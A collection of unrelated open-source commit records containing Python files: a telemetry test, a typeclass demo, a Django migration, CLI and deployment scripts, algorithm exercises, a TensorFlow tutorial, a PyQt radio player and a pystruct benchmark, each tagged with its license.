def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs('--enable-gpu-benchmarking')
def ValidatePage(self, page, tab, results):
test_success = tab.EvaluateJavaScript('window.__testSuccess')
if not test_success:
message = tab.EvaluateJavaScript('window.__testMessage')
raise page_test.Failure(message)
class ScreenshotSyncPage(page.Page):
def __init__(self, page_set, base_dir):
super(ScreenshotSyncPage, self).__init__(
url='file://screenshot_sync.html',
page_set=page_set,
base_dir=base_dir,
name='ScreenshotSync')
self.user_agent_type = 'desktop'
def RunNavigateSteps(self, action_runner):
action_runner.NavigateToPage(self)
action_runner.WaitForJavaScriptCondition(
'window.__testComplete', timeout_in_seconds=120)
class ScreenshotSyncProcess(test.Test):
"""Tests that screenhots are properly synchronized with the frame one which
they were requested"""
test = _ScreenshotSyncValidator
def CreateExpectations(self, page_set):
return expectations.ScreenshotSyncExpectations()
def CreatePageSet(self, options):
ps = page_set.PageSet(file_path=data_path, serving_dirs=[''])
ps.AddPage(ScreenshotSyncPage(ps, ps.base_dir))
return ps
| bsd-3-clause | Python |
48e19852c6e1f5a0f2792a62adeb560121d77d11 | Create __init__.py | thegreathippo/crispy | crispy/__init__.py | crispy/__init__.py | mit | Python |
||
ca25a4e2aedd657a10c7bfa2849f9f3d16f5ee9f | Add Eq demo | NicolasT/typeclasses | demo/eq.py | demo/eq.py | # typeclasses, an educational implementation of Haskell-style type
# classes, in Python
#
# Copyright (C) 2010 Nicolas Trangez <eikke eikke com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, version 2.1
# of the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
'''Some demonstrations of the Eq typeclass and its `eq` and `ne` functions'''
from typeclasses.eq import eq, ne
import typeclasses.instances.list
import typeclasses.instances.tuple
from typeclasses.instances.maybe import Just, Nothing
from typeclasses.instances.tree import Branch, Leaf
# List
assert eq([1, 2, 3], [1, 2, 3])
assert ne([0, 1, 2], [1, 2, 3])
# Tuple
assert eq((1, 2, 3, ), (1, 2, 3, ))
assert ne((0, 1, 2, ), (1, 2, 3, ))
# Maybe
assert eq(Nothing, Nothing)
assert eq(Just(1), Just(1))
assert ne(Just(1), Just(2))
assert ne(Just(1), Nothing)
# Tree
assert eq(Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)),
Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)))
assert ne(Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)),
Branch(Branch(Leaf(0), Leaf(1)), Branch(Leaf(2), Leaf(3))))
| lgpl-2.1 | Python |
|
176ab29c5f0506d5ba94a2676b81f34f7e2a6b3b | Add migration for expiration_date change (#28) | vittoriozamboni/django-groups-manager,vittoriozamboni/django-groups-manager | groups_manager/migrations/0005_auto_20181001_1009.py | groups_manager/migrations/0005_auto_20181001_1009.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2018-10-01 10:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('groups_manager', '0004_0_6_0_groupmember_expiration_date'),
]
operations = [
migrations.AlterField(
model_name='groupmember',
name='expiration_date',
field=models.DateTimeField(blank=True, default=None, null=True),
),
]
| mit | Python |
|
7043c46624df6f1899df9fc58e1a8631fc67f43d | add log.py | simbuerg/benchbuild,simbuerg/benchbuild | pprof/log.py | pprof/log.py | #!/usr/bin/env python
# encoding: utf-8
""" Analyze the PPROF database. """
from plumbum import cli
from pprof.driver import PollyProfiling
def print_runs(query):
""" Print all rows in this result query. """
if query is None:
return
for tup in query:
print("{} @ {} - {} id: {} group: {}".format(
tup.finished,
tup.experiment_name, tup.project_name,
tup.experiment_group, tup.run_group))
def print_logs(query, types=None):
""" Print status logs. """
from pprof.utils.schema import RunLog
if query is None:
return
query = query.filter(RunLog.status != 0)
for run, log in query:
print("{} @ {} - {} id: {} group: {} status: {}".format(
run.finished, run.experiment_name, run.project_name,
run.experiment_group, run.run_group,
log.status))
if "stderr" in types:
print "StdErr:"
print(log.stderr)
if "stdout" in types:
print "StdOut:"
print(log.stdout)
print
@PollyProfiling.subcommand("log")
class PprofLog(cli.Application):
""" Frontend command to the pprof database. """
@cli.switch(["-E", "--experiment"], str, list=True,
help="Experiments to fetch the log for.")
def experiment(self, experiments):
""" Set the experiments to fetch the log for. """
self._experiments = experiments
@cli.switch(["-e", "--experiment-id"], str, list=True,
help="Experiment IDs to fetch the log for.")
def experiment_ids(self, experiment_ids):
""" Set the experiment ids to fetch the log for. """
self._experiment_ids = experiment_ids
@cli.switch(["-P", "--project"], str, list=True,
help="Projects to fetch the log for.")
def project(self, projects):
""" Set the projects to fetch the log for. """
self._projects = projects
@cli.switch(["-p", "--project-id"], str, list=True,
help="Project IDs to fetch the log for.")
def project_ids(self, project_ids):
""" Set the project ids to fetch the log for. """
self._project_ids = project_ids
@cli.switch(["-t", "--type"], cli.Set("stdout", "stderr"), list=True,
help="Set the output types to print.")
def log_type(self, types):
""" Set the output types to print. """
self._types = types
_experiments = None
_experiment_ids = None
_projects = None
_project_ids = None
_types = None
def main(self):
""" Run the log command. """
from pprof.utils.schema import Session, Run, RunLog
s = Session()
exps = self._experiments
exp_ids = self._experiment_ids
projects = self._projects
project_ids = self._project_ids
types = self._types
if types is not None:
query = s.query(Run, RunLog).filter(Run.id == RunLog.run_id)
else:
query = s.query(Run)
if exps is not None:
query = query.filter(Run.experiment_name.in_(exps))
if exp_ids is not None:
query = query.filter(Run.experiment_group.in_(exp_ids))
if projects is not None:
query = query.filter(Run.project_name.in_(projects))
if project_ids is not None:
query = query.filter(Run.run_group.in_(project_ids))
if types is not None:
print_logs(query, types)
else:
print_runs(query)
| mit | Python |
|
caa92a302f3dcc6ed084ebc9f20db28c63d48d29 | Add missing file | warnes/irrigatorpro,warnes/irrigatorpro,warnes/irrigatorpro,warnes/irrigatorpro | irrigator_pro/uga/aggregates.py | irrigator_pro/uga/aggregates.py | from django.db import connections
from django.db.models.aggregates import Aggregate
from django.db.models.sql.aggregates import Aggregate as SQLAggregate
from uga.models import UGAProbeData
__initialized__ = False
class SimpleAggregate(Aggregate):
def add_to_query(self, query, alias, col, source, is_summary):
aggregate = SQLAggregate(col, source=source, is_summary=is_summary, **self.extra)
aggregate.sql_function = self.sql_function
aggregate.is_ordinal = getattr(self, 'is_ordinal', False)
aggregate.is_computed = getattr(self, 'is_computed', False)
if hasattr(self, 'sql_template'):
aggregate.sql_template = self.sql_template
query.aggregates[alias] = aggregate
class Date(SimpleAggregate):
sql_function = 'Date'
name = 'Date'
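# Usage sketch (the field name is hypothetical): given a DateTimeField such as
# `reading_time`, the aggregate can be applied as
#   UGAProbeData.objects.annotate(day=Date('reading_time'))
# which wraps the column in the SQL Date() function via add_to_query above.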
| mit | Python |
|
253cda3fc9d377dc64fe4b67b5fe55f911c8693f | Add startsliver script. | nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome | protogeni/test/startsliver.py | protogeni/test/startsliver.py | #! /usr/bin/env python
#
# GENIPUBLIC-COPYRIGHT
# Copyright (c) 2008-2009 University of Utah and the Flux Group.
# All rights reserved.
#
# Permission to use, copy, modify and distribute this software is hereby
# granted provided that (1) source code retains these copyright, permission,
# and disclaimer notices, and (2) redistributions including binaries
# reproduce the notices in supporting documentation.
#
# THE UNIVERSITY OF UTAH ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
# CONDITION. THE UNIVERSITY OF UTAH DISCLAIMS ANY LIABILITY OF ANY KIND
# FOR ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
#
#
#
import sys
import pwd
import getopt
import os
import time
import re
import xmlrpclib
from M2Crypto import X509
ACCEPTSLICENAME=1
execfile( "test-common.py" )
#
# Get a credential for myself, that allows me to do things at the SA.
#
mycredential = get_self_credential()
print "Got my SA credential"
#
# Lookup slice
#
myslice = resolve_slice( SLICENAME, mycredential )
print "Found the slice, asking for a credential ..."
#
# Get the slice credential.
#
slicecred = get_slice_credential( myslice, mycredential )
print "Got the slice credential, asking for a sliver credential ..."
#
# Get the sliver credential.
#
params = {}
params["credential"] = slicecred
rval,response = do_method("cm", "GetSliver", params)
if rval:
Fatal("Could not get Sliver credential")
pass
slivercred = response["value"]
print "Got the sliver credential, starting the sliver";
#
# Start the sliver.
#
params = {}
params["credential"] = slivercred
rval,response = do_method("cm", "StartSliver", params)
if rval:
Fatal("Could not start sliver")
pass
print "Sliver has been started ..."
| agpl-3.0 | Python |
|
aa88f2b64c8c2837022ee020862ec2c0a9a6e7ad | Add fabfile for generating docs in gh-pages branch. | openxc/openxc-python,openxc/openxc-python,openxc/openxc-python | fabfile.py | fabfile.py | from __future__ import with_statement
import os
from fabric.api import abort, local, puts, task, lcd
@task(default=True)
def docs(clean='no', browse_='no'):
with lcd('docs'):
local('make clean html')
temp_path = "/tmp/openxc-python-docs"
docs_path = "%s/docs/_build/html" % local("pwd", capture=True)
local('rm -rf %s' % temp_path)
os.makedirs(temp_path)
with lcd(temp_path):
local('cp -R %s %s' % (docs_path, temp_path))
local('git checkout gh-pages')
local('cp -R %s/html/* .' % temp_path)
local('touch .nojekyll')
local('git add -A')
local('git commit -m "Update Sphinx docs."')
local('git push')
local('git checkout master')
@task
def browse():
"""
Open the current dev docs in a browser tab.
"""
local("$BROWSER docs/_build/html/index.html")
@task(default=True)
def test(args=None):
local("tox")
@task
def upload():
"""
Build, register and upload to PyPI
"""
puts("Uploading to PyPI")
local('python setup.py sdist register upload')
| bsd-3-clause | Python |
|
1e4f86f3184d0ae09d2a14690257ba9d4c44edb1 | remove dups (local sequence alignments) | brwnj/repertoire,brwnj/repertoire | repertoire/collapse_reads.py | repertoire/collapse_reads.py | #!/usr/bin/env python
# encoding: utf-8
"""
matches = pairwise2.align.localms(target, query, 1, -1, -3, -2)
try:
# highest scoring match first
return int(matches[0][3])
except IndexError:
"""
import sys
from toolshed import nopen
from parsers import read_fastx
from Bio import pairwise2
from collections import OrderedDict
def fastq_to_dict(fastq):
"""docstring for fastq_to_dict"""
d = {}
with nopen(fastq) as fh:
for name, seq, qual in read_fastx(fh):
d[name] = {'seq':seq,'qual':qual}
return d
def main(args):
fd = fastq_to_dict(args.fastq)
# convert to ordered dictionary
fd = OrderedDict(sorted(fd.items(), key=lambda (k, v): len(v['seq'])))
seen = {}
for i, (name, query) in enumerate(fd.iteritems(), start=1):
if i % 1000 == 0:
print >> sys.stderr, ">> processed %d reads..." % i
subseq = False
q_id, q_cregion, q_fwork = name.split(":")
expected_score = len(query['seq']) - args.mismatches
# maps onto same length or longer seqs
for t_name, target in fd.iteritems():
if t_name == name: continue
# skipping reads we've already mapped
if seen.has_key(t_name): continue
t_id, t_cregion, t_fwork = t_name.split(":")
# only attempt to collapse things of the same c-region and framework
if q_cregion != t_cregion and q_fwork != t_fwork: continue
# locally align using smith-waterman
matches = pairwise2.align.localms(target['seq'], query['seq'], 1, -1, -1, -1)
high_score = matches[0][2]
if high_score == expected_score:
subseq = True
break
if not subseq:
# print fastq record
print "@%s\n%s\n+\n%s" % (name, query['seq'], query['qual'])
seen[name] = ""
if __name__ == '__main__':
import argparse
p = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
p.add_argument('fastq', help="reads to collapse to unique")
p.add_argument('-m', '--mismatches', type=int, default=0,
help="mismatches to allow during mapping [ %(default)s ]")
main(p.parse_args()) | mit | Python |
|
736093f945ff53c4fe6d9d8d2e0c4afc28d9ace3 | Add answer to leetcode rotate list | air-upc/chimera,air-upc/chimera | chimera/py/leetcode_rotate_list.py | chimera/py/leetcode_rotate_list.py | # coding=utf-8
"""
chimera.leetcode_rotate_list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Given a list, rotate the list to the right by k places, where k is
non-negative.
For example:
Given 1->2->3->4->5->NULL and k = 2,
return 4->5->1->2->3->NULL.
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
if not head:
return head
tail = p = head
n = 0
while tail:
n += 1
p = tail
tail = tail.next
p.next = head
rotate = k % n
for i in xrange(n - rotate):
p = head
head = head.next
p.next = None
return head
| mit | Python |
|
22bb91cfc1b1dc637e33625dcbaf3e8499b384ec | Add LinearRegression.py | Jamjomjara/snu-artoon,Jamjomjara/snu-artoon | 1-LinearRegression/LinearRegression.py | 1-LinearRegression/LinearRegression.py | import tensorflow as tf
# TensorFlow Example (1) - Linear Regression
#
# (model) y = ax + b
# By giving some pairs of (x, y) that satisfies the given model,
# TensorFlow can compute the value of 'a' and 'b'
# by using very simple Machine Learning(ML) algorithm.
# 1. implementing our model.
# TensorFlow has an element called 'node'.
# A 'node' can be formed from a Tensor(i.e. values),
# or by combining nodes with arithmetic operations.
# We should implement our model (y = ax + b) first.
# There are a few types of values.
# 1. constants: values which cannot change.
# 2. placeholders: values that we should give when computing.
# 3. variables: values that can be changed while computing.
# therefore, in our model y = ax + b
# 'x' is given by us so it should be 'placeholder',
# and 'a' and 'b' is computed by TensorFlow, which therefore
# should be variables.
x = tf.placeholder(tf.float32)
a = tf.Variable([1.0], tf.float32)
b = tf.Variable([1.0]) # data type inferred automatically
model_y = a * x + b # same with 'y = tf.add(tf.multiply(a, x), b)'
# 2. let the computer know our goal.
# To compute 'a' and 'b' value using ML,
# we should let machine know what is their goal.
# in this case, the computation result of the model should be
# the same with real value(which is given by us.)
# to accomplish this goal, we design a function(which is called
# 'loss function'), and the goal of the machine is to minimize
# the value of loss function.
real_y = tf.placeholder(tf.float32)
error = model_y - real_y
squared_error = tf.square(error) # make all errors positive to compute average
sum_error = tf.reduce_sum(squared_error) # this is our loss function whose value should be minimized.
# 3. compute 'a' and 'b' value using ML.
# now we designed our model and the goal of the machine.
# therefore, now what we have to do is just command the machine
# to find the value 'a' and 'b' that minimizes our loss function(sum_error)
# to do that, we give our machine some data sets.
# (the exact (x, y) pairs to compute 'a' and 'b' values.
x_training_data = [1, 2, 3, 4]
y_training_data = [3, 5, 7, 9] # y = 2x + 1 is the correct model
# to run a TensorFlow computation, we need something called 'Session'.
session = tf.Session()
# first, make all the Variables to be set to its initial value(which are wrong)
session.run(tf.global_variables_initializer())
# then, make machine to compute the right 'a' and 'b' value.
optimizer = tf.train.GradientDescentOptimizer(0.01) # Machine's algorithm to find 'a' and 'b'
train = optimizer.minimize(sum_error)
for _ in range(10000):
session.run(train, {x: x_training_data, real_y: y_training_data})
# 4. Machine finished computing 'a' and 'b' value.
# this code below will print out that values.
a, b = session.run([a, b])
print("a :", a)
print("b :", b)
| mit | Python |
|
08d7e10d74297f16e4bcb5cfb7de0749d9d101bc | add missing fiel | codesyntax/CodeSkel,codesyntax/CodeSkel,codesyntax/CodeSkel,codesyntax/CodeSkel | codeskel/localcommands/__init__.py | codeskel/localcommands/__init__.py | mit | Python |
||
0c289af5ef7f26796bdc4b4183f456074f7440f7 | Create dijkstra.py | oy-vey/algorithms-and-data-structures,oy-vey/algorithms-and-data-structures | 3-AlgorithmsOnGraphs/Week4/dijkstra/dijkstra.py | 3-AlgorithmsOnGraphs/Week4/dijkstra/dijkstra.py | #Uses python3
import sys
import queue
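# Implementation notes (descriptive only): distances start at an upper bound
# (the sum of all edge costs plus one) used as "infinity"; a priority queue of
# (distance, vertex) pairs is popped repeatedly, and a vertex is re-inserted
# whenever an edge relaxation improves its tentative distance.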
def Dijkstra(adj, s, cost, t):
dist = list()
prev = list()
inf = 0
for c in cost:
inf += sum(c)
inf += 1
for u in range(0, len(adj)):
dist.append(inf)
prev.append(None)
dist[s] = 0
H = queue.PriorityQueue()
for i, d in enumerate(dist):
H.put((d, i))
processed = set()
while not H.empty():
u = H.get()[1]
if u in processed:
pass
for i, v in enumerate(adj[u]):
if dist[v] > dist[u] + cost[u][i]:
dist[v] = dist[u] + cost[u][i]
prev[v] = u
H.put((dist[v], v))
processed.add(v)
if dist[t]< inf:
return dist[t]
else:
return -1
def distance(adj, cost, s, t):
return Dijkstra(adj, s, cost, t)
if __name__ == '__main__':
# input = sys.stdin.read()
with open('test', 'r') as f:
input = f.read()
data = list(map(int, input.split()))
n, m = data[0:2]
data = data[2:]
edges = list(zip(zip(data[0:(3 * m):3], data[1:(3 * m):3]), data[2:(3 * m):3]))
data = data[3 * m:]
adj = [[] for _ in range(n)]
cost = [[] for _ in range(n)]
for ((a, b), w) in edges:
adj[a - 1].append(b - 1)
cost[a - 1].append(w)
s, t = data[0] - 1, data[1] - 1
print(distance(adj, cost, s, t))
| mit | Python |
|
26ae4b857780ba8d5ecfbd8c8cab39452f086e58 | add conf.py for docs (test) | bazooka-ci/bazooka,bazooka-ci/bazooka,bazooka-ci/bazooka,bazooka-ci/bazooka | docs/conf.py | docs/conf.py | # -*- coding: utf-8 -*-
#
# bazooka documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 3 13:34:12 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.md'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bazooka'
copyright = u'2015, Bazooka-ci team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'master'
# The full version, including alpha/beta/rc tags.
release = 'master'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bazookadoc'
| mit | Python |
|
18e8cee5c19329dac7e931cb00e67f8d19e3f89d | add script `compare_win_set` | johnyf/gr1experiments | examples/bunny/compare_win_set.py | examples/bunny/compare_win_set.py | from dd import cudd
b = cudd.BDD()
u_gr1x = cudd.load('winning_set', b)
u_slugs = b.load('winning_set_bdd.txt')
env_action_slugs = b.load('env_action_slugs.txt')
sys_action_slugs = b.load('sys_action_slugs.txt')
assumption_0_slugs = b.load('assumption_0_slugs.txt')
goal_0_slugs = b.load('goal_0_slugs.txt')
env_action_gr1x = b.load('env_action_gr1x.txt')
sys_action_gr1x = b.load('sys_action_gr1x.txt')
assumption_0_gr1x = b.load('assumption_0_gr1x.txt')
goal_0_gr1x = b.load('goal_0_gr1x.txt')
assert env_action_slugs == env_action_gr1x
assert sys_action_slugs == sys_action_gr1x
assert assumption_0_slugs == assumption_0_gr1x
assert goal_0_slugs == goal_0_gr1x
if u_gr1x == u_slugs:
print('Winning set is the same.')
else:
print('Different winning sets!')
del u_gr1x, u_slugs
| bsd-3-clause | Python |
|
46bcea5a4c1a46cd7e458fa5fd7b761bbea25b4f | add a RAI radio player | stefantalpalaru/bbc_radio | rai_radio.py | rai_radio.py | #!/usr/bin/env python
import sys
from PySide.QtCore import *
from PySide.QtGui import *
from pprint import pprint
import subprocess
import argparse
# URL list taken from http://www.rai.it/dl/portale/info_radio.html
STATIONS = [
['Radio 1', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162834'],
['Radio 2', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162063'],
['Radio 3', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162841'],
['Filodiffusione 4', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173799'],
['Filodiffusione 5', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173832'],
['Isoradio', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173875'],
['Gr Parlamento', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173879'],
['Rai Italia Radio', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173887'],
['Web Radio WR6', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174078'],
['Web Radio WR7', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174083'],
['Web Radio WR8', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174086 '],
]
WIN_TITLE = "RAI radio"
class Win(QMainWindow):
def __init__(self, parent=None):
super(Win, self).__init__(parent)
self.player = None
# args
        parser = argparse.ArgumentParser(description='RAI radio player')
parser.add_argument('-p', '--player', default='vlc')
parser.add_argument('player_args', nargs='*')
args = parser.parse_args()
self.player_prog = args.player
self.player_args = args.player_args
# UI
self.setWindowTitle(WIN_TITLE)
self.setMinimumSize(300, 600)
self.scroll_area = QScrollArea()
self.widget = QWidget()
self.layout = QVBoxLayout()
self.widget.setLayout(self.layout)
self.scroll_area.setWidgetResizable(True)
self.scroll_area.setWidget(self.widget)
self.setCentralWidget(self.scroll_area)
for name, url in STATIONS:
button = QPushButton(name.replace('&', '&&'))
button.args = {
'name': name,
'url': url,
}
button.clicked.connect(self.listen)
self.layout.addWidget(button)
# timer
self.timer = QTimer()
self.timer.timeout.connect(self.check_player)
def listen(self):
pressed_button = self.sender()
for button in self.widget.findChildren(QPushButton):
if button != pressed_button and not button.isEnabled():
button.setEnabled(True)
break
pressed_button.setEnabled(False)
# stop the running player instance before starting another one
if self.player:
if self.player.poll() is None:
self.player.terminate()
self.player.wait()
cmd = [self.player_prog]
cmd.extend(self.player_args)
cmd.append(pressed_button.args['url'])
try:
self.player = subprocess.Popen(cmd)
except Exception, e:
msg_box = QMessageBox()
msg_box.setText('Couldn\'t launch\n"%s"' % ' '.join(cmd))
msg_box.setInformativeText(unicode(e))
msg_box.exec_()
pressed_button.setEnabled(True)
self.setWindowTitle('%s - %s' % (pressed_button.args['name'], WIN_TITLE))
self.timer.start(200)
def check_player(self):
if self.player and self.player.poll() is not None:
# the player has been stopped
self.player = None
self.timer.stop()
self.setWindowTitle(WIN_TITLE)
for button in self.widget.findChildren(QPushButton):
if not button.isEnabled():
button.setEnabled(True)
break
if __name__ == '__main__':
app = QApplication(sys.argv)
win = Win()
win.show()
sys.exit(app.exec_())
| bsd-3-clause | Python |
|
f4e4d2781662f7f8c38b12aacc5ad0fca6e1b4da | add comparison with svm^struct on multiclass data | pystruct/pystruct,wattlebird/pystruct,amueller/pystruct,massmutual/pystruct,pystruct/pystruct,d-mittal/pystruct,massmutual/pystruct,amueller/pystruct,wattlebird/pystruct,d-mittal/pystruct | examples/multiclass_comparision_svm_struct.py | examples/multiclass_comparision_svm_struct.py | """
==================================================================
Comparing PyStruct and SVM-Struct for multi-class classification
==================================================================
This example compares the performance of pystruct and SVM^struct on a
multi-class problem.
For the example to work, you need to install SVM^multiclass and
set the path in this file.
We are not using SVM^python, as that would be much slower, and we would
need to implement our own model in a SVM^python compatible way.
Instead, we just call the SVM^multiclass binary.
This comparison is only meaningful in the sense that both libraries
use general structured prediction solvers to solve the task.
The specialized implementation of the Crammer-Singer SVM in LibLinear
is much faster than either one.
The plots are adjusted to disregard the time spend in writing
the data to the file for use with SVM^struct. As this time is
machine dependent, the plots are only approximate (unless you measure
that time for your machine and re-adjust)
"""
import tempfile
import os
from time import time
import numpy as np
from sklearn.datasets import dump_svmlight_file
from sklearn.datasets import fetch_mldata, load_iris, load_digits
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from pystruct.models import CrammerSingerSVMModel
from pystruct.learners import OneSlackSSVM
# please set the path to the svm-struct multiclass binaries here
svmstruct_path = "/home/local/lamueller/tools/svm_multiclass/"
class MultiSVM():
"""scikit-learn compatible interface for SVM^multi.
Dumps the data to a file and calls the binary.
"""
def __init__(self, C=1.):
self.C = C
def fit(self, X, y):
self.model_file = tempfile.mktemp(suffix='.svm')
train_data_file = tempfile.mktemp(suffix='.svm_dat')
dump_svmlight_file(X, y + 1, train_data_file, zero_based=False)
C = self.C * 100. * len(X)
os.system(svmstruct_path + "svm_multiclass_learn -c %f %s %s"
% (C, train_data_file, self.model_file))
def _predict(self, X, y=None):
if y is None:
y = np.ones(len(X))
train_data_file = tempfile.mktemp(suffix='.svm_dat')
dump_svmlight_file(X, y, train_data_file, zero_based=False)
prediction_file = tempfile.mktemp(suffix='.out')
os.system(svmstruct_path + "svm_multiclass_classify %s %s %s"
% (train_data_file, self.model_file, prediction_file))
return np.loadtxt(prediction_file)
def predict(self, X):
return self._predict(X)[:, 0] - 1
def score(self, X, y):
y_pred = self.predict(X)
return accuracy_score(y, y_pred)
def decision_function(self, X):
return self._predict(X)[:, 1:]
def eval_on_data(X, y, svm, Cs):
accuracies, times = [], []
for C in Cs:
svm.C = C
start = time()
svm.fit(X, y)
times.append(time() - start)
accuracies.append(accuracy_score(y, svm.predict(X)))
return accuracies, times
def plot_timings(times_svmstruct, times_pystruct, dataset="usps"):
    plt.figure(figsize=(4, 3))
plt.plot(times_svmstruct, ":", label="SVM^struct", c='blue')
plt.plot(times_pystruct, "-.", label="PyStruct", c='red')
plt.xlabel("C")
plt.xticks(np.arange(len(Cs)), Cs)
plt.ylabel("learning time (s)")
plt.legend(loc='best')
plt.savefig("timings_%s.pdf" % dataset, bbox_inches='tight')
if __name__ == "__main__":
Cs = 10. ** np.arange(-4, 1)
multisvm = MultiSVM()
    svm = OneSlackSSVM(CrammerSingerSVMModel(), tol=0.001)
iris = load_iris()
X, y = iris.data, iris.target
accs_pystruct, times_pystruct = eval_on_data(X, y, svm, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, multisvm, Cs=Cs)
# the adjustment of 0.01 is for the time spent writing the file, see above.
plot_timings(np.array(times_svmstruct) - 0.01, times_pystruct,
dataset="iris")
digits = load_digits()
X, y = digits.data / 16., digits.target
    accs_pystruct, times_pystruct = eval_on_data(X, y, svm, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, MultiSVM(), Cs=Cs)
plot_timings(np.array(times_svmstruct) - 0.85, times_pystruct,
dataset="digits")
digits = fetch_mldata("USPS")
X, y = digits.data, digits.target.astype(np.int)
